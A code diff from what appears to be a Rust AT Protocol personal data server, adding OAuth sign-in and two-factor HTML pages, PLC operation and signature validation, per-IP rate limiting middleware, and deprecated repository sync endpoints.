placeholder="Enter your password"> 455 + </div> 456 + 457 + <div class="checkbox-group"> 458 + <input type="checkbox" id="remember_device" name="remember_device" value="true"> 459 + <label for="remember_device">Remember this device</label> 460 + </div> 461 + 462 + <div class="buttons"> 463 + <button type="submit" formaction="/oauth/authorize/deny" class="btn btn-secondary">Cancel</button> 464 + <button type="submit" class="btn btn-primary">Sign in</button> 465 + </div> 466 + </form> 467 + 468 + <div class="footer"> 469 + By signing in, you agree to share your account information with this application. 470 + </div> 471 + </div> 472 + </div> 473 + </body> 474 + </html>"#, 475 + styles = base_styles(), 476 + client_display = html_escape(client_display), 477 + scope_display = html_escape(scope_display), 478 + request_uri = html_escape(request_uri), 479 + error_html = error_html, 480 + login_hint_value = html_escape(login_hint_value), 481 + ) 482 + } 483 + 484 + pub struct DeviceAccount { 485 + pub did: String, 486 + pub handle: String, 487 + pub email: String, 488 + pub last_used_at: DateTime<Utc>, 489 + } 490 + 491 + pub fn account_selector_page( 492 + client_id: &str, 493 + client_name: Option<&str>, 494 + request_uri: &str, 495 + accounts: &[DeviceAccount], 496 + ) -> String { 497 + let client_display = client_name.unwrap_or(client_id); 498 + 499 + let accounts_html: String = accounts 500 + .iter() 501 + .map(|account| { 502 + let initials = get_initials(&account.handle); 503 + format!( 504 + r#"<form method="POST" action="/oauth/authorize/select" style="margin:0"> 505 + <input type="hidden" name="request_uri" value="{request_uri}"> 506 + <input type="hidden" name="did" value="{did}"> 507 + <button type="submit" class="account-item"> 508 + <div class="avatar">{initials}</div> 509 + <div class="account-info"> 510 + <span class="handle">@{handle}</span> 511 + <span class="email">{email}</span> 512 + </div> 513 + <span class="chevron">›</span> 514 + </button> 515 + </form>"#, 516 + request_uri = html_escape(request_uri), 517 + did = html_escape(&account.did), 518 + initials = html_escape(&initials), 519 + handle = html_escape(&account.handle), 520 + email = html_escape(&account.email), 521 + ) 522 + }) 523 + .collect(); 524 + 525 + format!( 526 + r#"<!DOCTYPE html> 527 + <html lang="en"> 528 + <head> 529 + <meta charset="UTF-8"> 530 + <meta name="viewport" content="width=device-width, initial-scale=1.0"> 531 + <meta name="robots" content="noindex"> 532 + <title>Choose an account</title> 533 + <style>{styles}</style> 534 + </head> 535 + <body> 536 + <div class="container"> 537 + <div class="card"> 538 + <h1>Choose an account</h1> 539 + <p class="subtitle">to continue to <strong>{client_display}</strong></p> 540 + 541 + <div class="accounts"> 542 + {accounts_html} 543 + </div> 544 + 545 + <div class="divider"></div> 546 + 547 + <a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link"> 548 + Sign in with another account 549 + </a> 550 + </div> 551 + </div> 552 + </body> 553 + </html>"#, 554 + styles = base_styles(), 555 + client_display = html_escape(client_display), 556 + accounts_html = accounts_html, 557 + request_uri_encoded = urlencoding::encode(request_uri), 558 + ) 559 + } 560 + 561 + pub fn two_factor_page( 562 + request_uri: &str, 563 + channel: &str, 564 + error_message: Option<&str>, 565 + ) -> String { 566 + let error_html = error_message 567 + .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg))) 568 + .unwrap_or_default(); 569 + 570 + let (title, subtitle) = match channel { 571 + "email" => ("Check your email", "We sent a verification code to your email"), 572 + "Discord" => ("Check Discord", "We sent a verification code to your Discord"), 573 + "Telegram" => ("Check Telegram", "We sent a verification code to your Telegram"), 574 + "Signal" => ("Check Signal", "We sent a verification code to your Signal"), 575 + _ => ("Check your messages", "We sent you a verification code"), 576 + }; 577 + 578 + format!( 579 + r#"<!DOCTYPE html> 580 + <html lang="en"> 581 + <head> 582 + <meta charset="UTF-8"> 583 + <meta name="viewport" content="width=device-width, initial-scale=1.0"> 584 + <meta name="robots" content="noindex"> 585 + <title>Verify your identity</title> 586 + <style>{styles}</style> 587 + </head> 588 + <body> 589 + <div class="container"> 590 + <div class="card"> 591 + <h1>{title}</h1> 592 + <p class="subtitle">{subtitle}</p> 593 + 594 + {error_html} 595 + 596 + <form method="POST" action="/oauth/authorize/2fa"> 597 + <input type="hidden" name="request_uri" value="{request_uri}"> 598 + 599 + <div class="form-group"> 600 + <label for="code">Verification code</label> 601 + <input type="text" id="code" name="code" class="code-input" 602 + placeholder="000000" 603 + pattern="[0-9]{{6}}" maxlength="6" 604 + inputmode="numeric" autocomplete="one-time-code" 605 + autofocus required> 606 + </div> 607 + 608 + <button type="submit" class="btn btn-primary" style="width:100%">Verify</button> 609 + </form> 610 + 611 + <p class="help-text"> 612 + Code expires in 10 minutes. 613 + </p> 614 + </div> 615 + </div> 616 + </body> 617 + </html>"#, 618 + styles = base_styles(), 619 + title = title, 620 + subtitle = subtitle, 621 + request_uri = html_escape(request_uri), 622 + error_html = error_html, 623 + ) 624 + } 625 + 626 + pub fn error_page(error: &str, error_description: Option<&str>) -> String { 627 + let description = error_description.unwrap_or("An error occurred during the authorization process."); 628 + 629 + format!( 630 + r#"<!DOCTYPE html> 631 + <html lang="en"> 632 + <head> 633 + <meta charset="UTF-8"> 634 + <meta name="viewport" content="width=device-width, initial-scale=1.0"> 635 + <meta name="robots" content="noindex"> 636 + <title>Authorization Error</title> 637 + <style>{styles}</style> 638 + </head> 639 + <body> 640 + <div class="container"> 641 + <div class="card text-center"> 642 + <div class="icon">⚠️</div> 643 + <h1>Authorization Failed</h1> 644 + <div class="error-code">{error}</div> 645 + <p class="subtitle" style="margin-bottom:0">{description}</p> 646 + <div style="margin-top:1.5rem"> 647 + <button onclick="window.close()" class="btn btn-secondary">Close this window</button> 648 + </div> 649 + </div> 650 + </div> 651 + </body> 652 + </html>"#, 653 + styles = base_styles(), 654 + error = html_escape(error), 655 + description = html_escape(description), 656 + ) 657 + } 658 + 659 + pub fn success_page(client_name: Option<&str>) -> String { 660 + let client_display = client_name.unwrap_or("The application"); 661 + 662 + format!( 663 + r#"<!DOCTYPE html> 664 + <html lang="en"> 665 + <head> 666 + <meta charset="UTF-8"> 667 + <meta name="viewport" content="width=device-width, initial-scale=1.0"> 668 + <meta name="robots" content="noindex"> 669 + <title>Authorization Successful</title> 670 + <style>{styles}</style> 671 + </head> 672 + <body> 673 + <div class="container"> 674 + <div class="card text-center"> 675 + <div class="success-icon">✓</div> 676 + <h1 style="color:var(--success)">Authorization Successful</h1> 677 + <p class="subtitle">{client_display} has been granted access to your account.</p> 678 + <p class="help-text">You can close this window and return to the application.</p> 679 + </div> 680 + </div> 681 + </body> 682 + </html>"#, 683 + styles = base_styles(), 684 + client_display = html_escape(client_display), 685 + ) 686 + } 687 + 688 + fn html_escape(s: &str) -> String { 689 + s.replace('&', "&amp;") 690 + .replace('<', "&lt;") 691 + .replace('>', "&gt;") 692 + .replace('"', "&quot;") 693 + .replace('\'', "&#39;") 694 + } 695 + 696 + fn get_initials(handle: &str) -> String { 697 + let clean = handle.trim_start_matches('@'); 698 + if clean.is_empty() { 699 + return "?".to_string(); 700 + } 701 + clean.chars().next().unwrap_or('?').to_uppercase().to_string() 702 + } 703 + 704 + pub fn mask_email(email: &str) -> String { 705 + if let Some(at_pos) = email.find('@') { 706 + let local = &email[..at_pos]; 707 + let domain = &email[at_pos..]; 708 + 709 + if local.len() <= 2 { 710 + format!("{}***{}", local.chars().next().unwrap_or('*'), domain) 711 + } else { 712 + let first = local.chars().next().unwrap_or('*'); 713 + let last = local.chars().last().unwrap_or('*'); 714 + format!("{}***{}{}", first, last, domain) 715 + } 716 + } else { 717 + "***".to_string() 718 + } 719 + }
+158
src/plc/mod.rs
··· 319 Ok(()) 320 } 321 322 #[cfg(test)] 323 mod tests { 324 use super::*;
··· 319 Ok(()) 320 } 321 322 + pub struct PlcValidationContext { 323 + pub server_rotation_key: String, 324 + pub expected_signing_key: String, 325 + pub expected_handle: String, 326 + pub expected_pds_endpoint: String, 327 + } 328 + 329 + pub fn validate_plc_operation_for_submission( 330 + op: &Value, 331 + ctx: &PlcValidationContext, 332 + ) -> Result<(), PlcError> { 333 + validate_plc_operation(op)?; 334 + 335 + let obj = op.as_object() 336 + .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?; 337 + 338 + let op_type = obj.get("type") 339 + .and_then(|v| v.as_str()) 340 + .unwrap_or(""); 341 + 342 + if op_type != "plc_operation" { 343 + return Ok(()); 344 + } 345 + 346 + let rotation_keys = obj.get("rotationKeys") 347 + .and_then(|v| v.as_array()) 348 + .ok_or_else(|| PlcError::InvalidResponse("rotationKeys must be an array".to_string()))?; 349 + 350 + let rotation_key_strings: Vec<&str> = rotation_keys 351 + .iter() 352 + .filter_map(|v| v.as_str()) 353 + .collect(); 354 + 355 + if !rotation_key_strings.contains(&ctx.server_rotation_key.as_str()) { 356 + return Err(PlcError::InvalidResponse( 357 + "Rotation keys do not include server's rotation key".to_string() 358 + )); 359 + } 360 + 361 + let verification_methods = obj.get("verificationMethods") 362 + .and_then(|v| v.as_object()) 363 + .ok_or_else(|| PlcError::InvalidResponse("verificationMethods must be an object".to_string()))?; 364 + 365 + if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) { 366 + if atproto_key != ctx.expected_signing_key { 367 + return Err(PlcError::InvalidResponse("Incorrect signing key".to_string())); 368 + } 369 + } 370 + 371 + let also_known_as = obj.get("alsoKnownAs") 372 + .and_then(|v| v.as_array()) 373 + .ok_or_else(|| PlcError::InvalidResponse("alsoKnownAs must be an array".to_string()))?; 374 + 375 + let expected_handle_uri = format!("at://{}", ctx.expected_handle); 376 + let has_correct_handle = also_known_as 377 + .iter() 378 + .filter_map(|v| v.as_str()) 379 + .any(|s| s == expected_handle_uri); 380 + 381 + if !has_correct_handle && !also_known_as.is_empty() { 382 + return Err(PlcError::InvalidResponse( 383 + "Incorrect handle in alsoKnownAs".to_string() 384 + )); 385 + } 386 + 387 + let services = obj.get("services") 388 + .and_then(|v| v.as_object()) 389 + .ok_or_else(|| PlcError::InvalidResponse("services must be an object".to_string()))?; 390 + 391 + if let Some(pds_service) = services.get("atproto_pds").and_then(|v| v.as_object()) { 392 + let service_type = pds_service.get("type").and_then(|v| v.as_str()).unwrap_or(""); 393 + if service_type != "AtprotoPersonalDataServer" { 394 + return Err(PlcError::InvalidResponse( 395 + "Incorrect type on atproto_pds service".to_string() 396 + )); 397 + } 398 + 399 + let endpoint = pds_service.get("endpoint").and_then(|v| v.as_str()).unwrap_or(""); 400 + if endpoint != ctx.expected_pds_endpoint { 401 + return Err(PlcError::InvalidResponse( 402 + "Incorrect endpoint on atproto_pds service".to_string() 403 + )); 404 + } 405 + } 406 + 407 + Ok(()) 408 + } 409 + 410 + pub fn verify_operation_signature( 411 + op: &Value, 412 + rotation_keys: &[String], 413 + ) -> Result<bool, PlcError> { 414 + let obj = op.as_object() 415 + .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?; 416 + 417 + let sig_b64 = obj.get("sig") 418 + .and_then(|v| v.as_str()) 419 + .ok_or_else(|| PlcError::InvalidResponse("Missing sig".to_string()))?; 420 + 421 + let sig_bytes = URL_SAFE_NO_PAD 422 + .decode(sig_b64) 423 + .map_err(|e| PlcError::InvalidResponse(format!("Invalid signature encoding: {}", e)))?; 424 + 425 + let signature = Signature::from_slice(&sig_bytes) 426 + .map_err(|e| PlcError::InvalidResponse(format!("Invalid signature format: {}", e)))?; 427 + 428 + let mut unsigned_op = op.clone(); 429 + if let Some(unsigned_obj) = unsigned_op.as_object_mut() { 430 + unsigned_obj.remove("sig"); 431 + } 432 + 433 + let cbor_bytes = serde_ipld_dagcbor::to_vec(&unsigned_op) 434 + .map_err(|e| PlcError::Serialization(e.to_string()))?; 435 + 436 + for key_did in rotation_keys { 437 + if let Ok(true) = verify_signature_with_did_key(key_did, &cbor_bytes, &signature) { 438 + return Ok(true); 439 + } 440 + } 441 + 442 + Ok(false) 443 + } 444 + 445 + fn verify_signature_with_did_key( 446 + did_key: &str, 447 + message: &[u8], 448 + signature: &Signature, 449 + ) -> Result<bool, PlcError> { 450 + use k256::ecdsa::{VerifyingKey, signature::Verifier}; 451 + 452 + if !did_key.starts_with("did:key:z") { 453 + return Err(PlcError::InvalidResponse("Invalid did:key format".to_string())); 454 + } 455 + 456 + let multibase_part = &did_key[8..]; 457 + let (_, decoded) = multibase::decode(multibase_part) 458 + .map_err(|e| PlcError::InvalidResponse(format!("Failed to decode did:key: {}", e)))?; 459 + 460 + if decoded.len() < 2 { 461 + return Err(PlcError::InvalidResponse("Invalid did:key data".to_string())); 462 + } 463 + 464 + let (codec, key_bytes) = if decoded[0] == 0xe7 && decoded[1] == 0x01 { 465 + (0xe701u16, &decoded[2..]) 466 + } else { 467 + return Err(PlcError::InvalidResponse("Unsupported key type in did:key".to_string())); 468 + }; 469 + 470 + if codec != 0xe701 { 471 + return Err(PlcError::InvalidResponse("Only secp256k1 keys are supported".to_string())); 472 + } 473 + 474 + let verifying_key = VerifyingKey::from_sec1_bytes(key_bytes) 475 + .map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?; 476 + 477 + Ok(verifying_key.verify(message, signature).is_ok()) 478 + } 479 + 480 #[cfg(test)] 481 mod tests { 482 use super::*;
+216
src/rate_limit.rs
···
··· 1 + use axum::{ 2 + body::Body, 3 + extract::ConnectInfo, 4 + http::{HeaderMap, Request, StatusCode}, 5 + middleware::Next, 6 + response::{IntoResponse, Response}, 7 + Json, 8 + }; 9 + use governor::{ 10 + Quota, RateLimiter, 11 + clock::DefaultClock, 12 + state::{InMemoryState, NotKeyed, keyed::DefaultKeyedStateStore}, 13 + }; 14 + use std::{ 15 + net::SocketAddr, 16 + num::NonZeroU32, 17 + sync::Arc, 18 + }; 19 + 20 + pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>; 21 + pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>; 22 + 23 + #[derive(Clone)] 24 + pub struct RateLimiters { 25 + pub login: Arc<KeyedRateLimiter>, 26 + pub oauth_token: Arc<KeyedRateLimiter>, 27 + pub password_reset: Arc<KeyedRateLimiter>, 28 + pub account_creation: Arc<KeyedRateLimiter>, 29 + } 30 + 31 + impl Default for RateLimiters { 32 + fn default() -> Self { 33 + Self::new() 34 + } 35 + } 36 + 37 + impl RateLimiters { 38 + pub fn new() -> Self { 39 + Self { 40 + login: Arc::new(RateLimiter::keyed( 41 + Quota::per_minute(NonZeroU32::new(10).unwrap()) 42 + )), 43 + oauth_token: Arc::new(RateLimiter::keyed( 44 + Quota::per_minute(NonZeroU32::new(30).unwrap()) 45 + )), 46 + password_reset: Arc::new(RateLimiter::keyed( 47 + Quota::per_hour(NonZeroU32::new(5).unwrap()) 48 + )), 49 + account_creation: Arc::new(RateLimiter::keyed( 50 + Quota::per_hour(NonZeroU32::new(10).unwrap()) 51 + )), 52 + } 53 + } 54 + 55 + pub fn with_login_limit(mut self, per_minute: u32) -> Self { 56 + self.login = Arc::new(RateLimiter::keyed( 57 + Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 58 + )); 59 + self 60 + } 61 + 62 + pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self { 63 + self.oauth_token = Arc::new(RateLimiter::keyed( 64 + Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap())) 65 + )); 66 + self 67 + } 68 + 69 + pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self { 70 + self.password_reset = Arc::new(RateLimiter::keyed( 71 + Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) 72 + )); 73 + self 74 + } 75 + 76 + pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self { 77 + self.account_creation = Arc::new(RateLimiter::keyed( 78 + Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap())) 79 + )); 80 + self 81 + } 82 + } 83 + 84 + fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String { 85 + if let Some(forwarded) = headers.get("x-forwarded-for") { 86 + if let Ok(value) = forwarded.to_str() { 87 + if let Some(first_ip) = value.split(',').next() { 88 + return first_ip.trim().to_string(); 89 + } 90 + } 91 + } 92 + 93 + if let Some(real_ip) = headers.get("x-real-ip") { 94 + if let Ok(value) = real_ip.to_str() { 95 + return value.trim().to_string(); 96 + } 97 + } 98 + 99 + addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string()) 100 + } 101 + 102 + fn rate_limit_response() -> Response { 103 + ( 104 + StatusCode::TOO_MANY_REQUESTS, 105 + Json(serde_json::json!({ 106 + "error": "RateLimitExceeded", 107 + "message": "Too many requests. Please try again later." 108 + })), 109 + ) 110 + .into_response() 111 + } 112 + 113 + pub async fn login_rate_limit( 114 + ConnectInfo(addr): ConnectInfo<SocketAddr>, 115 + axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, 116 + request: Request<Body>, 117 + next: Next, 118 + ) -> Response { 119 + let client_ip = extract_client_ip(request.headers(), Some(addr)); 120 + 121 + if limiters.login.check_key(&client_ip).is_err() { 122 + tracing::warn!(ip = %client_ip, "Login rate limit exceeded"); 123 + return rate_limit_response(); 124 + } 125 + 126 + next.run(request).await 127 + } 128 + 129 + pub async fn oauth_token_rate_limit( 130 + ConnectInfo(addr): ConnectInfo<SocketAddr>, 131 + axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, 132 + request: Request<Body>, 133 + next: Next, 134 + ) -> Response { 135 + let client_ip = extract_client_ip(request.headers(), Some(addr)); 136 + 137 + if limiters.oauth_token.check_key(&client_ip).is_err() { 138 + tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded"); 139 + return rate_limit_response(); 140 + } 141 + 142 + next.run(request).await 143 + } 144 + 145 + pub async fn password_reset_rate_limit( 146 + ConnectInfo(addr): ConnectInfo<SocketAddr>, 147 + axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, 148 + request: Request<Body>, 149 + next: Next, 150 + ) -> Response { 151 + let client_ip = extract_client_ip(request.headers(), Some(addr)); 152 + 153 + if limiters.password_reset.check_key(&client_ip).is_err() { 154 + tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded"); 155 + return rate_limit_response(); 156 + } 157 + 158 + next.run(request).await 159 + } 160 + 161 + pub async fn account_creation_rate_limit( 162 + ConnectInfo(addr): ConnectInfo<SocketAddr>, 163 + axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, 164 + request: Request<Body>, 165 + next: Next, 166 + ) -> Response { 167 + let client_ip = extract_client_ip(request.headers(), Some(addr)); 168 + 169 + if limiters.account_creation.check_key(&client_ip).is_err() { 170 + tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded"); 171 + return rate_limit_response(); 172 + } 173 + 174 + next.run(request).await 175 + } 176 + 177 + #[cfg(test)] 178 + mod tests { 179 + use super::*; 180 + 181 + #[test] 182 + fn test_rate_limiters_creation() { 183 + let limiters = RateLimiters::new(); 184 + assert!(limiters.login.check_key(&"test".to_string()).is_ok()); 185 + } 186 + 187 + #[test] 188 + fn test_rate_limiter_exhaustion() { 189 + let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap())); 190 + let key = "test_ip".to_string(); 191 + 192 + assert!(limiter.check_key(&key).is_ok()); 193 + assert!(limiter.check_key(&key).is_ok()); 194 + assert!(limiter.check_key(&key).is_err()); 195 + } 196 + 197 + #[test] 198 + fn test_different_keys_have_separate_limits() { 199 + let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap())); 200 + 201 + assert!(limiter.check_key(&"ip1".to_string()).is_ok()); 202 + assert!(limiter.check_key(&"ip1".to_string()).is_err()); 203 + assert!(limiter.check_key(&"ip2".to_string()).is_ok()); 204 + } 205 + 206 + #[test] 207 + fn test_builder_pattern() { 208 + let limiters = RateLimiters::new() 209 + .with_login_limit(20) 210 + .with_oauth_token_limit(60) 211 + .with_password_reset_limit(3) 212 + .with_account_creation_limit(5); 213 + 214 + assert!(limiters.login.check_key(&"test".to_string()).is_ok()); 215 + } 216 + }
+18
src/state.rs
··· 1 use crate::config::AuthConfig; 2 use crate::repo::PostgresBlockStore; 3 use crate::storage::{BlobStorage, S3BlobStorage}; 4 use crate::sync::firehose::SequencedEvent; ··· 12 pub block_store: PostgresBlockStore, 13 pub blob_store: Arc<dyn BlobStorage>, 14 pub firehose_tx: broadcast::Sender<SequencedEvent>, 15 } 16 17 impl AppState { ··· 21 let block_store = PostgresBlockStore::new(db.clone()); 22 let blob_store = S3BlobStorage::new().await; 23 let (firehose_tx, _) = broadcast::channel(1000); 24 Self { 25 db, 26 block_store, 27 blob_store: Arc::new(blob_store), 28 firehose_tx, 29 } 30 } 31 }
··· 1 + use crate::circuit_breaker::CircuitBreakers; 2 use crate::config::AuthConfig; 3 + use crate::rate_limit::RateLimiters; 4 use crate::repo::PostgresBlockStore; 5 use crate::storage::{BlobStorage, S3BlobStorage}; 6 use crate::sync::firehose::SequencedEvent; ··· 14 pub block_store: PostgresBlockStore, 15 pub blob_store: Arc<dyn BlobStorage>, 16 pub firehose_tx: broadcast::Sender<SequencedEvent>, 17 + pub rate_limiters: Arc<RateLimiters>, 18 + pub circuit_breakers: Arc<CircuitBreakers>, 19 } 20 21 impl AppState { ··· 25 let block_store = PostgresBlockStore::new(db.clone()); 26 let blob_store = S3BlobStorage::new().await; 27 let (firehose_tx, _) = broadcast::channel(1000); 28 + let rate_limiters = Arc::new(RateLimiters::new()); 29 + let circuit_breakers = Arc::new(CircuitBreakers::new()); 30 Self { 31 db, 32 block_store, 33 blob_store: Arc::new(blob_store), 34 firehose_tx, 35 + rate_limiters, 36 + circuit_breakers, 37 } 38 + } 39 + 40 + pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self { 41 + self.rate_limiters = Arc::new(rate_limiters); 42 + self 43 + } 44 + 45 + pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self { 46 + self.circuit_breakers = Arc::new(circuit_breakers); 47 + self 48 } 49 }
-4
src/sync/crawl.rs
··· 19 Query(params): Query<NotifyOfUpdateParams>, 20 ) -> Response { 21 info!("Received notifyOfUpdate from hostname: {}", params.hostname); 22 - info!("TODO: Queue job for notifyOfUpdate (not implemented)"); 23 - 24 (StatusCode::OK, Json(json!({}))).into_response() 25 } 26 ··· 34 Json(input): Json<RequestCrawlInput>, 35 ) -> Response { 36 info!("Received requestCrawl for hostname: {}", input.hostname); 37 - info!("TODO: Queue job for requestCrawl (not implemented)"); 38 - 39 (StatusCode::OK, Json(json!({}))).into_response() 40 }
··· 19 Query(params): Query<NotifyOfUpdateParams>, 20 ) -> Response { 21 info!("Received notifyOfUpdate from hostname: {}", params.hostname); 22 (StatusCode::OK, Json(json!({}))).into_response() 23 } 24 ··· 32 Json(input): Json<RequestCrawlInput>, 33 ) -> Response { 34 info!("Received requestCrawl for hostname: {}", input.hostname); 35 (StatusCode::OK, Json(json!({}))).into_response() 36 }
+209
src/sync/deprecated.rs
···
··· 1 + use crate::state::AppState; 2 + use crate::sync::car::encode_car_header; 3 + use axum::{ 4 + Json, 5 + extract::{Query, State}, 6 + http::StatusCode, 7 + response::{IntoResponse, Response}, 8 + }; 9 + use cid::Cid; 10 + use ipld_core::ipld::Ipld; 11 + use jacquard_repo::storage::BlockStore; 12 + use serde::{Deserialize, Serialize}; 13 + use serde_json::json; 14 + use std::io::Write; 15 + use std::str::FromStr; 16 + use tracing::error; 17 + 18 + const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000; 19 + 20 + #[derive(Deserialize)] 21 + pub struct GetHeadParams { 22 + pub did: String, 23 + } 24 + 25 + #[derive(Serialize)] 26 + pub struct GetHeadOutput { 27 + pub root: String, 28 + } 29 + 30 + pub async fn get_head( 31 + State(state): State<AppState>, 32 + Query(params): Query<GetHeadParams>, 33 + ) -> Response { 34 + let did = params.did.trim(); 35 + 36 + if did.is_empty() { 37 + return ( 38 + StatusCode::BAD_REQUEST, 39 + Json(json!({"error": "InvalidRequest", "message": "did is required"})), 40 + ) 41 + .into_response(); 42 + } 43 + 44 + let result = sqlx::query!( 45 + r#" 46 + SELECT r.repo_root_cid 47 + FROM repos r 48 + JOIN users u ON r.user_id = u.id 49 + WHERE u.did = $1 50 + "#, 51 + did 52 + ) 53 + .fetch_optional(&state.db) 54 + .await; 55 + 56 + match result { 57 + Ok(Some(row)) => (StatusCode::OK, Json(GetHeadOutput { root: row.repo_root_cid })).into_response(), 58 + Ok(None) => ( 59 + StatusCode::BAD_REQUEST, 60 + Json(json!({"error": "HeadNotFound", "message": "Could not find root for DID"})), 61 + ) 62 + .into_response(), 63 + Err(e) => { 64 + error!("DB error in get_head: {:?}", e); 65 + ( 66 + StatusCode::INTERNAL_SERVER_ERROR, 67 + Json(json!({"error": "InternalError"})), 68 + ) 69 + .into_response() 70 + } 71 + } 72 + } 73 + 74 + #[derive(Deserialize)] 75 + pub struct GetCheckoutParams { 76 + pub did: String, 77 + } 78 + 79 + pub async fn get_checkout( 80 + State(state): State<AppState>, 81 + Query(params): Query<GetCheckoutParams>, 82 + ) -> Response { 83 + let did = params.did.trim(); 84 + 85 + if did.is_empty() { 86 + return ( 87 + StatusCode::BAD_REQUEST, 88 + Json(json!({"error": "InvalidRequest", "message": "did is required"})), 89 + ) 90 + .into_response(); 91 + } 92 + 93 + let repo_row = sqlx::query!( 94 + r#" 95 + SELECT r.repo_root_cid 96 + FROM repos r 97 + JOIN users u ON u.id = r.user_id 98 + WHERE u.did = $1 99 + "#, 100 + did 101 + ) 102 + .fetch_optional(&state.db) 103 + .await 104 + .unwrap_or(None); 105 + 106 + let head_str = match repo_row { 107 + Some(r) => r.repo_root_cid, 108 + None => { 109 + let user_exists = sqlx::query!("SELECT id FROM users WHERE did = $1", did) 110 + .fetch_optional(&state.db) 111 + .await 112 + .unwrap_or(None); 113 + 114 + if user_exists.is_none() { 115 + return ( 116 + StatusCode::NOT_FOUND, 117 + Json(json!({"error": "RepoNotFound", "message": "Repo not found"})), 118 + ) 119 + .into_response(); 120 + } else { 121 + return ( 122 + StatusCode::NOT_FOUND, 123 + Json(json!({"error": "RepoNotFound", "message": "Repo not initialized"})), 124 + ) 125 + .into_response(); 126 + } 127 + } 128 + }; 129 + 130 + let head_cid = match Cid::from_str(&head_str) { 131 + Ok(c) => c, 132 + Err(_) => { 133 + return ( 134 + StatusCode::INTERNAL_SERVER_ERROR, 135 + Json(json!({"error": "InternalError", "message": "Invalid head CID"})), 136 + ) 137 + .into_response(); 138 + } 139 + }; 140 + 141 + let mut car_bytes = match encode_car_header(&head_cid) { 142 + Ok(h) => h, 143 + Err(e) => { 144 + return ( 145 + StatusCode::INTERNAL_SERVER_ERROR, 146 + Json(json!({"error": "InternalError", "message": format!("Failed to encode CAR header: {}", e)})), 147 + ) 148 + .into_response(); 149 + } 150 + }; 151 + 152 + let mut stack = vec![head_cid]; 153 + let mut visited = std::collections::HashSet::new(); 154 + let mut remaining = MAX_REPO_BLOCKS_TRAVERSAL; 155 + 156 + while let Some(cid) = stack.pop() { 157 + if visited.contains(&cid) { 158 + continue; 159 + } 160 + visited.insert(cid); 161 + if remaining == 0 { 162 + break; 163 + } 164 + remaining -= 1; 165 + 166 + if let Ok(Some(block)) = state.block_store.get(&cid).await { 167 + let cid_bytes = cid.to_bytes(); 168 + let total_len = cid_bytes.len() + block.len(); 169 + let mut writer = Vec::new(); 170 + crate::sync::car::write_varint(&mut writer, total_len as u64) 171 + .expect("Writing to Vec<u8> should never fail"); 172 + writer.write_all(&cid_bytes) 173 + .expect("Writing to Vec<u8> should never fail"); 174 + writer.write_all(&block) 175 + .expect("Writing to Vec<u8> should never fail"); 176 + car_bytes.extend_from_slice(&writer); 177 + 178 + if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) { 179 + extract_links_ipld(&value, &mut stack); 180 + } 181 + } 182 + } 183 + 184 + ( 185 + StatusCode::OK, 186 + [(axum::http::header::CONTENT_TYPE, "application/vnd.ipld.car")], 187 + car_bytes, 188 + ) 189 + .into_response() 190 + } 191 + 192 + fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) { 193 + match value { 194 + Ipld::Link(cid) => { 195 + stack.push(*cid); 196 + } 197 + Ipld::Map(map) => { 198 + for v in map.values() { 199 + extract_links_ipld(v, stack); 200 + } 201 + } 202 + Ipld::List(arr) => { 203 + for v in arr { 204 + extract_links_ipld(v, stack); 205 + } 206 + } 207 + _ => {} 208 + } 209 + }
+3 -2
src/sync/mod.rs
··· 2 pub mod car; 3 pub mod commit; 4 pub mod crawl; 5 pub mod firehose; 6 pub mod frame; 7 pub mod import; 8 pub mod listener; 9 - pub mod relay_client; 10 pub mod repo; 11 pub mod subscribe_repos; 12 pub mod util; ··· 15 pub use blob::{get_blob, list_blobs}; 16 pub use commit::{get_latest_commit, get_repo_status, list_repos}; 17 pub use crawl::{notify_of_update, request_crawl}; 18 - pub use repo::{get_blocks, get_repo, get_record}; 19 pub use subscribe_repos::subscribe_repos; 20 pub use verify::{CarVerifier, VerifiedCar, VerifyError};
··· 2 pub mod car; 3 pub mod commit; 4 pub mod crawl; 5 + pub mod deprecated; 6 pub mod firehose; 7 pub mod frame; 8 pub mod import; 9 pub mod listener; 10 pub mod repo; 11 pub mod subscribe_repos; 12 pub mod util; ··· 15 pub use blob::{get_blob, list_blobs}; 16 pub use commit::{get_latest_commit, get_repo_status, list_repos}; 17 pub use crawl::{notify_of_update, request_crawl}; 18 + pub use deprecated::{get_checkout, get_head}; 19 + pub use repo::{get_blocks, get_record, get_repo}; 20 pub use subscribe_repos::subscribe_repos; 21 pub use verify::{CarVerifier, VerifiedCar, VerifyError};
-83
src/sync/relay_client.rs
